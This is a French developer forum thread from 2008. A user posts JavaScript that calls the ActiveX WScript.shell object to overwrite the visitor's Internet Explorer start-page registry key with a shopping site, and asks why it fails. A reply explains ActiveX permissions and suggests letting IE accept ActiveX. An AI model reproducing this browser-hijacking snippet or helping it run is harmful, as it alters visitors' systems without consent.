Objet active X

layeure Messages postés 2 Date d'inscription jeudi 21 juillet 2005 Statut Membre Dernière intervention 4 janvier 2009 - 14 févr. 2008 à 16:50
cs_bultez Messages postés 13615 Date d'inscription jeudi 13 février 2003 Statut Membre Dernière intervention 15 octobre 2013 - 15 févr. 2008 à 05:27
bonjour

voila le probleme est que ce code ne marche pas sur mon serveur alors que ca marche tres bien sur mon ordi

<script type="text/javascript" >
var shell = ActiveXObject("WScript.shell");
    var run = "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page";
    var val = "http://www.shoplike.fr";
        shell.RegWrite(run,val,"REG_SZ");
</script>
quand je l execute dans mon serveur ca m affiche ce message d'erreur
"un composant activeX ne peut pas crée d'objet"

comment faire pour que ca marche sur mon serveur ?

merci d avance de votre reponse.

1 réponse

cs_bultez Messages postés 13615 Date d'inscription jeudi 13 février 2003 Statut Membre Dernière intervention 15 octobre 2013 30
15 févr. 2008 à 05:27
Bonjour,

>>"un composant activeX ne peut pas crée d'objet"
    message typique lorsque l'on n'a pas les droits pour utiliser

>>quand je l execute dans mon serveur ca m affiche ce message d'erreur
    c'est ton serveur ? ou celui dans quelconque FAI ?
    le tien : il faut y autoriser les activeX
    celui d'un FAI : oublie. nul ne les autorise et "peu" sont sous Windows

    d'ailleurs tu es sûr d'exécuter ça sur le serveur ?
        le javascript se déroule sur le micro client, pas sur un serveur...

    pour que ça baigne, sur ton micro, paramètrer IE pour qu'il accepte les ActiveX

<hr />                Cordialement            Bul         «mon Site»     «M'écrire»
0
Rejoignez-nous